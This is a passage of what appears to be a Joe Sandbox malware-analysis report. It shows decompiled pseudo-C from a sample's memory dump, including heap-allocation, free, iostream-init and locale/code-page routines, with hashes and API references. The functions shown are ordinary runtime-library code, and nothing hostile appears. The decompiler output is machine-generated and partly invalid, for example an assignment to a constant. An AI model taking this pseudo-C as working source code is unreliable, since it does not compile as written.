Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c395313f89804cf125e1091bf9beafc9789f722cb682644e8354fc01c2773617
Instruction ID: 1b5f655ba83bedf544a1b1b97ad6808984bf832f82bbe54fb4b41811f510c44f
Opcode Fuzzy Hash: c395313f89804cf125e1091bf9beafc9789f722cb682644e8354fc01c2773617
Instruction Fuzzy Hash: D10149726043166BC7219FADC881D9AFB99FB457B4F140669E545A76C0D770A810C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01383584 Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E01383584(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E013858A2(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E013871B2(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E0138340A(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}

0x01383595
0x01383597
0x0138359c
0x0138359e
0x013835a2
0x013835a4
0x013835ac
0x013835ae
0x013835b5
0x013835bb
0x013835c1
0x013835c7
0x013835cf
0x013835d2
0x013835d3
0x013835d6
0x013835dc
0x013835e0
0x013835e4
0x013835e5
0x00000000
0x013835e5
0x013835ed

APIs

Part of subcall function 013858A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01385F13,00000001,00000364,00000002,000000FF,?,?,01378B75,?), ref: 013858E3

_free.LIBCMT ref: 013835A4

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: bf681a7fe7f96d79fbd5c2e017d68d0acf400672a72af52789ca811215a5eb0a
Instruction ID: a8211dcaad2a15b4d2d83ed683aab5360a66e8b65ba8cdf97169b56359b08285
Opcode Fuzzy Hash: bf681a7fe7f96d79fbd5c2e017d68d0acf400672a72af52789ca811215a5eb0a
Instruction Fuzzy Hash: 0C010CB6E00219AFDB50DFA9C441ADEBBB8FB48710F104126E914E7340E774E645CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013858A2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013858A2(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x14a6124, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01384B32();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0137FD24(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E01384B7D(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x013858a8
0x013858ad
0x013858bb
0x013858bb
0x013858c1
0x013858c3
0x013858c3
0x013858da
0x013858e3
0x013858eb
0x00000000
0x00000000
0x013858cb
0x013858cd
0x013858ef
0x013858f4
0x013858fa
0x00000000
0x013858fa
0x013858d6
0x013858d8
0x00000000
0x00000000
0x013858d8
0x00000000
0x013858da
0x013858b3
0x013858b9
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01385F13,00000001,00000364,00000002,000000FF,?,?,01378B75,?), ref: 013858E3

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8076ce01b96f9976564f2301c2ae8c2421c318a282342bc35347539c9c4a54ae
Instruction ID: b3748f56b11ae2b773ba6cc7e8f10692d672fe59ebe18738aad3af419a78acac
Opcode Fuzzy Hash: 8076ce01b96f9976564f2301c2ae8c2421c318a282342bc35347539c9c4a54ae
Instruction Fuzzy Hash: 46F0B4323643656BEF317B6AD804F5A3F9C9B41668B154023AD15AA194CA20D80087E1

Uniqueness

Uniqueness Score: -1.00%

Function 01389AF4 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E01389AF4(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t22;

				 *0x14a5bc4 =  *0x14a5bc4 + 1;
				_t22 = _a4;
				_t11 = E013858A2(0x1000, 1); // executed
				 *((intOrPtr*)(_t22 + 4)) = _t11;
				E013871B2(0);
				if( *((intOrPtr*)(_t22 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t22 + 4)) = _t22 + 0x14;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t22 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t22 + 4));
				 *(_t22 + 8) =  *(_t22 + 8) & 0x00000000;
				 *_t22 = _t15;
				return _t15;
			}

0x01389af9
0x01389b00
0x01389b0c
0x01389b13
0x01389b16
0x01389b25
0x01389b34
0x01389b3c
0x01389b3f
0x01389b27
0x01389b27
0x01389b2a
0x01389b2a
0x01389b40
0x01389b43
0x01389b46
0x01389b4b
0x01389b4f

APIs

Part of subcall function 013858A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01385F13,00000001,00000364,00000002,000000FF,?,?,01378B75,?), ref: 013858E3

_free.LIBCMT ref: 01389B16

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: b9f834fc559dd82eb2ed0b440eb1199582d8cb98be57666f13a032a5f0789036
Instruction ID: 120e8e2648dfc0f8980b15b50a16806ede99c42201a43cd6fcf783d4cc712f90
Opcode Fuzzy Hash: b9f834fc559dd82eb2ed0b440eb1199582d8cb98be57666f13a032a5f0789036
Instruction Fuzzy Hash: 1BF096725007009FD3359F49D805B52F7F8EF90B15F50842ED29A8B590D7B4E445CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0138871A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0138871A(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0137FD24(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x14a6124, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01384B32();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E01384B7D(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x01388720
0x01388726
0x01388758
0x0138875d
0x01388763
0x00000000
0x01388763
0x0138872a
0x0138872c
0x0138872c
0x01388743
0x0138874c
0x01388754
0x00000000
0x00000000
0x01388734
0x01388736
0x00000000
0x00000000
0x0138873f
0x01388741
0x00000000
0x00000000
0x01388741
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,01378B75,?,?,?,?,?,01371221,?,?), ref: 0138874C

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 28bf4230342de78d267d9b15c357fb570d637dba95de5ed35811cb2994738101
Instruction ID: 4f983472f82cac113b47262f97a3666d503d5a8e24248d76762b51b6edaa0754
Opcode Fuzzy Hash: 28bf4230342de78d267d9b15c357fb570d637dba95de5ed35811cb2994738101
Instruction Fuzzy Hash: C0E0ED312413A75BFB323B6D9D04B5B3EEC9F512A8F8500A0BEA996580DB30D92082E1

Uniqueness

Uniqueness Score: -1.00%

Function 01376CB1 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01376CB1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				short _t11;
				void* _t21;

				_t21 = __ecx;
				E013768D0(__ebx, __ecx, __edi, __ecx, __eflags);
				_t17 = __ecx;
				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
				_t11 = E01373749(__ebx, __ecx, __edx, __edi, 0x20); // executed
				 *((short*)(_t21 + 0x40)) = _t11;
				if( *((intOrPtr*)(_t21 + 0x38)) == 0) {
					_t17 = _t21;
					_push(0);
					_t11 = E01371C56(_t21,  *(_t21 + 0xc) | 0x00000004);
				}
				if(_a8 != 0) {
					return E01377B28(_t17, _t21);
				}
				return _t11;
			}

0x01376cb5
0x01376cb7
0x01376cbf
0x01376cc1
0x01376cc7
0x01376cca
0x01376cd3
0x01376cd7
0x01376cdc
0x01376cde
0x01376ce4
0x01376ce4
0x01376ced
0x00000000
0x01376cf5
0x01376cf8

APIs

std::ios_base::_Init.LIBCPMT ref: 01376CB7

Part of subcall function 013768D0: __EH_prolog3.LIBCMT ref: 013768D7
Part of subcall function 013768D0: std::locale::_Init.LIBCPMT ref: 01376920

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Init$H_prolog3std::ios_base::_std::locale::_
String ID:
API String ID: 2854901245-0
Opcode ID: 2e151f5c99c5e53ef4394c4b0f1b05d9c0728dc12407adbdd56e02c9888651eb
Instruction ID: 3743d49be30556ed1211490d33a6e5f3d9579d57dba415c52dfb3c821cd33606
Opcode Fuzzy Hash: 2e151f5c99c5e53ef4394c4b0f1b05d9c0728dc12407adbdd56e02c9888651eb
Instruction Fuzzy Hash: 94F0E5B190071567FB30AA698459B5BBBD8EF10638F00581EE58257680CABDF440C790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0138FB10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0138FB10(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E013857CB(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0138fb15
0x0138fb16
0x0138fb1d
0x0138fbc1
0x0138fbda
0x0138fbe0
0x0138fbe5
0x0138fbe7
0x0138fbe7
0x0138fbed
0x0138fbf0
0x0138fbf0
0x0138fbdc
0x0138fbdc
0x00000000
0x0138fbdc
0x0138fb23
0x0138fb28
0x00000000
0x00000000
0x0138fb2e
0x0138fb33
0x0138fb35
0x0138fb35
0x0138fb3b
0x00000000
0x00000000
0x0138fb40
0x0138fb57
0x0138fb57
0x0138fb60
0x0138fb62
0x00000000
0x00000000
0x0138fb64
0x0138fb69
0x0138fb6b
0x0138fb6b
0x0138fb71
0x00000000
0x00000000
0x0138fb76
0x0138fb94
0x0138fb96
0x0138fbb9
0x00000000
0x0138fbbe
0x0138fbb1
0x00000000
0x00000000
0x0138fbb3
0x00000000
0x0138fbb3
0x0138fb78
0x0138fb80
0x00000000
0x00000000
0x0138fb82
0x0138fb85
0x0138fb8b
0x00000000
0x00000000
0x00000000
0x0138fb8d
0x0138fb8f
0x0138fb91
0x00000000
0x0138fb91
0x0138fb42
0x0138fb4a
0x00000000
0x00000000
0x0138fb4c
0x0138fb4f
0x0138fb55
0x00000000
0x00000000
0x00000000
0x0138fb55
0x0138fb5b
0x0138fb5d
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0138FE2E,00000002,00000000,?,?,?,0138FE2E,?,00000000), ref: 0138FBA9
GetLocaleInfoW.KERNEL32(?,20001004,0138FE2E,00000002,00000000,?,?,?,0138FE2E,?,00000000), ref: 0138FBD2
GetACP.KERNEL32(?,?,0138FE2E,?,00000000), ref: 0138FBE7

Strings

OCP, xrefs: 0138FB64
ACP, xrefs: 0138FB2E

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 20dda9aca6bf4f62f6ab64c251d12e8b8413d132641f6946e70bc6c70ba08b16
Instruction ID: 37646d184720a1e391f5d8600450baddc48e2e97d516648c79318850c539275d
Opcode Fuzzy Hash: 20dda9aca6bf4f62f6ab64c251d12e8b8413d132641f6946e70bc6c70ba08b16
Instruction Fuzzy Hash: 19219532700309EAEF37AF18C921AA777AEAF48B6CB568464EA09D7105F732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 0138FCE5 Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0138FCE5(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E01385D71(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E01385D71(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x1398754; // 0x17
					E0138FC84(_t89, 0, 0x1398640, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E0138F626(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E0138F70C(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E0138FB10(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E01377F14(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E013885AA(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E013885AA(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E013921FE(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x139863c; // 0x41
						_t75 = E0138FC84(_t89, _t97, 0x1398330, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E0138F70C(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0138F671(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0138F671(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x0138fced
0x0138fcf4
0x0138fcfb
0x0138fcff
0x0138fd03
0x0138fd11
0x0138fd16
0x0138fd17
0x0138fd18
0x0138fd19
0x0138fd21
0x0138fd23
0x0138fd29
0x0138fd2f
0x0138fd32
0x0138fd34
0x0138fd37
0x0138fd3b
0x0138fd42
0x0138fd4f
0x0138fd54
0x0138fd57
0x0138fd5a
0x0138fd5a
0x0138fd5c
0x0138fd5f
0x0138fd63
0x0138fdd3
0x0138fdd5
0x0138fdd7
0x0138fdea
0x0138fdea
0x0138fdf1
0x0138fdf7
0x0138fdfa
0x00000000
0x0138fdfa
0x0138fdd9
0x0138fddc
0x00000000
0x00000000
0x0138fde2
0x0138fde7
0x00000000
0x0138fd6a
0x0138fd6a
0x0138fd6e
0x0138fd80
0x0138fd84
0x0138fd89
0x0138fd8d
0x0138fd8e
0x0138fe16
0x0138fe16
0x0138fe18
0x0138fe24
0x0138fe2e
0x0138fe32
0x0138fe34
0x0138fe05
0x0138fe05
0x0138fe07
0x0138fe15
0x0138fe15
0x0138fe3a
0x0138fe40
0x0138fe42
0x00000000
0x00000000
0x0138fe49
0x0138fe4f
0x0138fe51
0x00000000
0x00000000
0x0138fe53
0x0138fe56
0x0138fe58
0x0138fe5a
0x0138fe5a
0x0138fe6b
0x0138fe70
0x0138fe72
0x0138fed2
0x0138fed4
0x00000000
0x0138fed4
0x0138fe77
0x0138fe81
0x0138fe91
0x0138fe97
0x0138fe99
0x00000000
0x00000000
0x0138fea1
0x0138feb0
0x0138feb6
0x0138feb8
0x00000000
0x00000000
0x0138fec2
0x0138feca
0x00000000
0x0138fecf
0x0138fd94
0x0138fda3
0x0138fda8
0x0138fdad
0x0138fdfd
0x0138fdfd
0x0138fdfd
0x0138fdff
0x0138fe03
0x00000000
0x00000000
0x00000000
0x0138fe03
0x0138fdaf
0x0138fdb1
0x0138fdb5
0x0138fdc7
0x0138fdcb
0x0138fdd0
0x0138fdd0
0x00000000
0x0138fdd0
0x0138fdb7
0x0138fdba
0x00000000
0x00000000
0x0138fdc0
0x00000000
0x0138fdc0
0x0138fd70
0x0138fd73
0x00000000
0x00000000
0x0138fd79
0x00000000
0x0138fd79

APIs

Part of subcall function 01385D71: GetLastError.KERNEL32(?,00000000,?,0137D1A2,00000000,00000000,?,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385D76
Part of subcall function 01385D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385E14

Part of subcall function 01385D71: _free.LIBCMT ref: 01385DD3
Part of subcall function 01385D71: _free.LIBCMT ref: 01385E09

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0138FDF1
IsValidCodePage.KERNEL32(00000000), ref: 0138FE3A
IsValidLocale.KERNEL32(?,00000001), ref: 0138FE49
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0138FE91
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0138FEB0

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 81644d65022bd89b17918896312dd43e41dec6dae42684c18ab8c3ec36d77c5f
